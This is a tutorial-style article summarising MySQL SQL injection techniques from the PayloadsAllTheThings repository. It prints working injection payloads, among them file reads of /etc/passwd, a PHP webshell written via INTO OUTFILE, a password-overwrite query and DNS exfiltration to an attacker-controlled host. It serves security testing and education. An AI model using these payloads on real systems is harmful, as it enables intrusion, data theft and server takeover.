# MySQL Specific SQL Injection Payloads: Techniques and Examples from PayloadsAllTheThings

> Discover MySQL specific SQL injection payloads to enumerate databases, extract data, and bypass WAFs. Explore techniques and examples from the PayloadsAllTheThings repository.

- Repository: [Swissky/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Tags: tutorial
- Published: 2026-03-01

---

**MySQL specific SQL injection payloads exploit database-specific functions, metadata schemas, and syntax variations to enumerate databases, extract sensitive data, execute system commands, and bypass Web Application Firewalls.**

The `swisskyrepo/PayloadsAllTheThings` repository contains a comprehensive catalog of MySQL specific SQL injection payloads organized by exploitation methodology. These payloads demonstrate how attackers manipulate MySQL's unique behaviors—such as `information_schema` queries, conditional comments, and file system primitives—to compromise database systems and achieve remote code execution.

## Enumeration via Default Databases and Information Schema

MySQL installations ship with built-in schemas that leak system metadata. Attackers target the `mysql` and `information_schema` databases to discover table structures, column names, and user privileges before extracting sensitive data.

The `information_schema` database serves as the primary metadata repository in MySQL. According to the source code in `SQL Injection/MySQL Injection.md`, attackers query `information_schema.schemata`, `information_schema.tables`, and `information_schema.columns` to map the database architecture. The `mysql` database contains authentication credentials and privilege tables that enable privilege escalation attacks.

## Comment Techniques for Query Truncation

MySQL supports multiple comment syntaxes that allow attackers to truncate query strings or execute version-conditional code. The repository documents four primary comment styles in `SQL Injection/MySQL Injection.md`:

- `#` – Hash comment (single line)
- `-- ` – Double-dash comment (requires trailing space)
- `/* … */` – Multi-line comment block
- `/*! … */` – Conditional execution comment (executes content only if MySQL version matches)

Attackers use these comments to neutralize trailing query segments. For example, injecting `' OR 1=1 -- ` effectively comments out password checks or `LIMIT` clauses in the original query.

## Testing Injection Points

Before launching complex attacks, security testers verify injection viability using database-specific strings. The repository distinguishes between **string context** and **numeric context** testing in `SQL Injection/MySQL Injection.md`:

```sql
-- String context testing (quote manipulation)
1' AND 1=1 --+
1' AND 1=2 --+

-- Numeric context testing (no quotes required)
1 AND 1=1
1 AND 1=2

```

These tests reveal how the application parses quotes, backslashes, and boolean logic, determining whether the injection point accepts direct SQL manipulation or requires encoding bypasses.

## Union-Based SQL Injection Techniques

### Detecting Column Count

Successful `UNION SELECT` operations require matching the exact column count of the original query. The repository outlines three methods in `SQL Injection/MySQL Injection.md` for determining column numbers:

1. **Iterative NULL injection** – Adding `NULL` values until the query succeeds: `' UNION SELECT NULL--`, `' UNION SELECT NULL,NULL--`
2. **ORDER BY enumeration** – Using `ORDER BY 1`, `ORDER BY 2` until an error indicates the column limit
3. **LIMIT INTO** – Leveraging `LIMIT 0,1 INTO @a,@b` to test variable assignment

### Data Extraction with GROUP_CONCAT

Once column count is established, attackers use MySQL-specific aggregation functions to concatenate multiple rows into a single column response. The `GROUP_CONCAT()` function bypasses row limitations by combining results:

```sql
-1' UNION SELECT NULL,NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+

```

For MySQL 5.7 and later, `json_arrayagg()` provides an alternative that avoids `GROUP_CONCAT` length limitations, as documented in the WAF bypass section of `SQL Injection/MySQL Injection.md`.

## Error-Based and Blind Injection Methods

### Error-Based Data Leakage

When applications display database error messages, attackers force MySQL to embed sensitive data within error output strings. The repository highlights three primary error-based functions in `SQL Injection/MySQL Injection.md`:

- **`EXTRACTVALUE()`** – Triggers XPath syntax errors containing injected data
- **`UPDATEXML()`** – Generates XML parsing errors with embedded payloads
- **`GTID_SUBSET()`** – Produces GTID set errors that leak data through error messages

Example payload using `EXTRACTVALUE`:

```sql
?id=1 AND EXTRACTVALUE(RAND(),CONCAT(0x7e,VERSION(),0x7e))--+

```

### Boolean-Based Blind Injection

In blind scenarios where no data is returned visibly, attackers infer information through conditional statements. The repository documents boolean inference using `IF()`, `MAKE_SET()`, and string comparison operators:

```sql
?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>100,1,0)--+

```

This payload checks if the first character of the database user has an ASCII value greater than 100, revealing one bit of information per request.

### Time-Based Delay Inference

When boolean responses are indistinguishable, attackers introduce measurable delays using `SLEEP()` or `BENCHMARK()`:

```sql
-- Delay-based boolean extraction
?id=1 AND IF(ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=65, SLEEP(5), 0)--+

-- CPU-intensive delay via BENCHMARK
?id=1 AND BENCHMARK(40000000,SHA1('test'))--+

```

The `BENCHMARK()` function executes an expression repeatedly, creating detectable latency without requiring time-based system functions that some WAFs block.

## File System Interaction and Code Execution

### Reading Arbitrary Files

MySQL's `LOAD_FILE()` function reads files accessible to the database process, enabling attackers to extract sensitive system files like `/etc/passwd` or application source code:

```sql
?id=1 UNION SELECT LOAD_FILE('/etc/passwd')--+

```

### Writing Webshells via OUTFILE

When the MySQL user possesses `FILE` privileges and the secure-file-priv configuration permits, attackers write malicious files to the web root using `INTO OUTFILE` or `INTO DUMPFILE`:

```sql
-- PHP webshell deployment
?id=1 UNION SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'--+

```

`INTO DUMPFILE` writes binary data without newline conversion, suitable for dropping compiled binaries or encoded payloads, as noted in `SQL Injection/MySQL Injection.md`.

## Advanced MySQL Injection Techniques

### DIOS (Dump In One Shot)

The **Dump In One Shot** technique concatenates entire database contents into a single result set, minimizing HTTP requests. This advanced method uses nested `GROUP_CONCAT` statements or `json_arrayagg()` to serialize multiple tables simultaneously, reducing detection footprints compared to iterative extraction.

### Out-of-Band (OOB) Exfiltration

When direct output channels are blocked, attackers force MySQL to initiate external connections. The repository documents DNS exfiltration via `LOAD_FILE()` with UNC paths:

```sql
?id=1 LOAD_FILE(CONCAT('\\\\',VERSION(),'.attacker-controlled.com\\a.txt'))--+

```

This technique also enables NTLM hash theft by forcing Windows systems to authenticate against attacker-controlled SMB shares.

### INSERT and ON DUPLICATE KEY Exploitation

In scenarios where injection occurs within `INSERT` statements, attackers leverage `ON DUPLICATE KEY UPDATE` to overwrite existing records. This technique effectively resets administrator passwords or escalates privileges by updating existing rows when primary key collisions occur:

```sql
INSERT INTO users (email,password) VALUES ('attacker@example.com','pwd'),('admin@example.com','pwd') 
ON DUPLICATE KEY UPDATE password='hacked'--+

```

### Truncation Attack Vectors

When applications enforce column length limits, attackers bypass authentication by exploiting string truncation. Submitting `admin@example.com` followed by spaces truncated to the column length may match the existing admin account, while the attacker controls the password field, as detailed in `SQL Injection/MySQL Injection.md`.

### WAF Bypass Strategies

The repository catalogs multiple techniques to evade Web Application Firewalls in `SQL Injection/MySQL Injection.md`:

- **Alternative metadata sources** – Querying `mysql.innodb_table_stats` instead of `information_schema.tables` when the latter is filtered
- **Version-agnostic variables** – Using `@@innodb_version` or `@@version_compile_os` to fingerprint systems without `VERSION()`
- **Encoding tricks** – Scientific notation (`1e1`), conditional comments (`/*!50000*/`), and wide-byte (GBK) injection using `%df'` to consume escape backslashes
- **JSON aggregation** – Replacing `GROUP_CONCAT` with `json_arrayagg()` to bypass function blacklists

## Summary

- **MySQL specific SQL injection payloads** leverage database-native functions like `GROUP_CONCAT`, `EXTRACTVALUE`, and `LOAD_FILE` to extract data and execute commands.
- The `information_schema` and `mysql` system databases provide complete metadata enumeration capabilities for mapping target architectures.
- **Union-based**, **error-based**, **boolean-blind**, and **time-based** techniques provide alternative extraction paths depending on application response behaviors.
- **File system primitives** (`LOAD_FILE`, `INTO OUTFILE`) enable reading sensitive files and writing webshells when `FILE` privileges are granted.
- **Advanced evasion** uses conditional comments, alternative metadata tables, and wide-byte encoding to bypass Web Application Firewalls and input validation.

## Frequently Asked Questions

### What are MySQL specific SQL injection payloads?

MySQL specific SQL injection payloads are attack strings that exploit syntax and functions unique to the MySQL database engine, such as `GROUP_CONCAT`, `EXTRACTVALUE`, `LOAD_FILE`, and conditional comments (`/*! … */`). These payloads target MySQL's `information_schema` metadata, file system capabilities, and specific error message formats to extract data or execute commands, distinguishing them from generic SQL injection or database-agnostic techniques.

### How do you enumerate databases using MySQL injection?

Attackers enumerate MySQL databases by querying the `information_schema.schemata` table through Union-based or Error-based injection. A typical payload uses `GROUP_CONCAT(schema_name)` to retrieve all database names in a single response: `-1' UNION SELECT NULL,GROUP_CONCAT(0x7c,schema_name,0x7c) FROM information_schema.schemata--+`. Alternatively, Blind injection techniques extract names character-by-character using `SUBSTRING()` and boolean comparisons when direct output is unavailable.

### What is the difference between Union-based and Error-based MySQL injection?

**Union-based injection** requires the application to display query results directly, allowing attackers to append `UNION SELECT` statements that return arbitrary data alongside legitimate results. **Error-based injection** works when applications display database error messages but suppress query output; attackers use functions like `EXTRACTVALUE()` or `UPDATEXML()` to force MySQL to embed sensitive data within error strings (e.g., `XPATH syntax error: '~5.7.38~'`). Union-based methods are faster and more efficient, while error-based techniques function in scenarios where result sets are hidden but verbose errors leak to the user interface.

### How do you bypass WAF filters in MySQL injection attacks?

WAF bypass techniques for MySQL injection include using alternative metadata tables like `mysql.innodb_table_stats` instead of filtered `information_schema` tables, employing `json_arrayagg()` instead of blacklisted `GROUP_CONCAT()`, and utilizing conditional comments (`/*!50000*/`) to obfuscate keywords. Wide-byte encoding using `%df'` consumes backslash escape characters in GBK character sets, while scientific notation (`1e1`) and version-specific conditional execution (`/*!50718 SELECT*/`) evade pattern-matching signatures.